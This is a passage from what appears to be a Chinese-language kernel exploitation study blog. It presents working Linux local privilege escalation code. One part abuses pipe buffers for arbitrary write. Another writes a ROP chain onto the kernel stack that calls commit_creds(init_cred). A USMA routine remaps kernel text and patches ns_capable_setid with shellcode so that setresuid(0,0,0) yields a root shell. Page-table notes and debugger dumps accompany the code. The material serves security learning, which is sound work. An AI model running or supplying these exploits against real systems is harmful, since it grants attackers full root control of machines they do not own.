write(pipe_fd[self_4th_pipe_pid][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

/* write data into dst page */
write(pipe_fd[self_2nd_pipe_pid][1], src, len);
puts("[+] Done.\n");
puts("[*] checking for root...");
get_root_shell();

覆写内核栈

覆写内核栈实现rop自然不是什么少见的利用手法,但是这里arttnba3大佬找到内核栈的方法还是第一次见

学习一下

由于 page 结构体数组与物理内存页一一对应的缘故,我们可以很轻易地在物理地址与 page 结构体地址间进行转换,而在页表当中存放的是物理地址,我们不难想到的是我们可以通过解析当前进程的页表来获取到内核栈的物理地址,从而获取到内核栈对应的 page,之后我们可以直接向内核栈上写 ROP chain 来完成任意代码执行

页表的地址可以通过 mm_struct 获取, mm_struct 地址可以通过 task_struct 获取,内核栈地址同样可以通过 task_struct 获取,那么这一切其实是水到渠成的事情:

简单来说就是获取栈对应的page,然后在页上布置gadget

因为栈上是ret调用gadget,所以绕过了CFI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
void privilege_escalation_by_rop(void)
{
size_t rop[0x1000], idx = 0;

/* resolving some vaddr */
pgd_vaddr_resolve();

/* reading the page table directly to get physical addr of kernel stack*/
puts("[*] Reading page table...");

stack_addr_another = vaddr_resolve(pgd_addr, stack_addr);
stack_addr_another &= (~PAGE_ATTR_NX); /* N/X bit */
stack_addr_another += page_offset_base;

printf("\033[32m\033[1m[+] Got another virt addr of kernel stack: \033[0m"
"0x%lx\n\n", stack_addr_another);

/* construct the ROP */
for (int i = 0; i < ((0x1000 - 0x100) / 8); i++) {
rop[idx++] = RET + kernel_offset;
}

rop[idx++] = POP_RDI_RET + kernel_offset;
rop[idx++] = INIT_CRED + kernel_offset;
rop[idx++] = COMMIT_CREDS + kernel_offset;
rop[idx++] = SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE +54 + kernel_offset;
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = (size_t) get_root_shell;
rop[idx++] = user_cs;
rop[idx++] = user_rflags;
rop[idx++] = user_sp;
rop[idx++] = user_ss;

stack_page = direct_map_addr_to_page_addr(stack_addr_another);

puts("[*] Hijacking current task's stack...");

sleep(5);

arbitrary_write_by_pipe((struct page*) (stack_page + 0x40 * 3), rop, 0xff0);

虽然arttnba3大佬选择自己重新解析stack的地址stack_addr_another,但实际上直接使用stack_addr也是能够成功的

虚拟地址翻译

虽然5级页表也已经挺成熟了,但现在大多数的x86机器依然是4级页表

pgd,pud,pmd,pte,四级页表只使用48位,除去12位的页内偏移,剩下的36位,四级页表平分各9位

kernel pwn中遇到的也主要是四级页表

我们知道cr3寄存器存储的是pgd基址的物理内存地址,每个进程都有自己的页表,在上下文切换时,当前进程的cr3寄存器会被存入task_struct->mm->pgd,不过存的并不是物理地址,而是pgd在直接映射区的地址,当然直接映射区的地址减去page_offset_base就是物理内存地址了

一般来说,一个页表有512个条目,每个条目占8字节,也就是说一个页表刚好占据一个页框,除pgd只有一个页表外,剩下的三级页表可能都会有多个页表

pgd,pud,pmd前三级页表条目的组成如下

pte的页表条目如下

PTE 有三个权限位,控制对页的访问。R/W 控制是只读还是读写;U/S 控制用户模式是否可以访问;XD 用来禁止从某些页读指令。

每次访问一个页,MMU 都会设置 A 位,称为引用位。内核可以利用这个引用位实现它的页替换算法。

每次写了一个页后,MMU 都会设置 D 位,称为修改位。修改位告诉内核在替换该页前是否必须写回牺牲页。

内核可以通过调用一条特殊的内核模式指令来清除引用位或修改位

特别注意:pmd表中,其页表项可能会置PS位,这代表不存在第四级页表pte,而是将pmd表项的物理基地址对应物理内存直接当做一个大页,虚拟地址的后21位当作偏移,此外虽然上图显示是4M页,但实际上因为只剩下了21位,所以实际上是2M页,在内核页表中页表项物理基址也确实是以2M为单位增加的

大页pmd:(基址增加单位2m)

1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff9480c0000000+0xa202000+22*8
00:0000│ 0xffff9480ca2020b0 ◂— 0x8000000002c000e3
01:0008│ 0xffff9480ca2020b8 ◂— 0x2e29063
02:0010│ 0xffff9480ca2020c0 ◂— 0x80000000030000e3
03:0018│ 0xffff9480ca2020c8 ◂— 0x80000000032000e3
04:0020│ 0xffff9480ca2020d0 ◂— 0x80000000034000e3
05:0028│ 0xffff9480ca2020d8 ◂— 0x80000000036000e3
06:0030│ 0xffff9480ca2020e0 ◂— 0x80000000038000e3
07:0038│ 0xffff9480ca2020e8 ◂— 0x8000000003a000e3

4k页pmd:(基址增加单位4k)

1
2
3
4
5
pwndbg> telescope 0xffff9480c0000000+0x2a4f000+268*8
00:0000│ 0xffff9480c2a4f860 ◂— 0x8000000002d70063 /* 'c' */
01:0008│ 0xffff9480c2a4f868 ◂— 0x8000000002d71063
02:0010│ 0xffff9480c2a4f870 ◂— 0x8000000002d72063
03:0018│ 0xffff9480c2a4f878 ◂— 0x8000000002d73063

USMA

解析目标内核代码物理地址paddr

用户mmap映射一段虚拟地址vaddr,然后劫持vaddr的页表的pte表项为paddr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
void privilege_escalation_by_usma(void)
{
#define NS_CAPABLE_SETID 0xffffffff810fd2a0

char *kcode_map, *kcode_func;
size_t dst_paddr, dst_vaddr, *rop, idx = 0;

/* resolving some vaddr */
pgd_vaddr_resolve();

kcode_map = mmap((void*) 0x114514000, 0x2000, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (!kcode_map) {
err_exit("FAILED to create mmap area!");
}

/* because of lazy allocation, we need to write it manually */
for (int i = 0; i < 8; i++) {
kcode_map[i] = "arttnba3"[i];
kcode_map[i + 0x1000] = "arttnba3"[i];
}

/* overwrite kernel code seg to exec shellcode directly :) */
dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n",
dst_vaddr);

dst_paddr = vaddr_resolve_for_3_level(pgd_addr, dst_vaddr);
dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
"0x%lx\n\n", dst_paddr);

/* remapping to our mmap area */
vaddr_remapping(pgd_addr, 0x114514000, dst_paddr);
vaddr_remapping(pgd_addr, 0x114514000 + 0x1000, dst_paddr + 0x1000);

/* overwrite kernel code segment directly */

puts("[*] Start overwriting kernel code segment...");

/**
* The setresuid() check for user's permission by ns_capable_setid(),
* so we can just patch it to let it always return true :)
*/
memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40,
"\xf3\x0f\x1e\xfa" /* endbr64 */
"H\xc7\xc0\x01\x00\x00\x00" /* mov rax, 1 */
"\xc3", /* ret */
12);

/* get root now :) */
puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

sleep(5);

setresuid(0, 0, 0);
get_root_shell();
}

ns_capable_setid函数用于在setreid时判断是否具有权限

我们劫持其为始终返回1,即拥有任意设置id的权限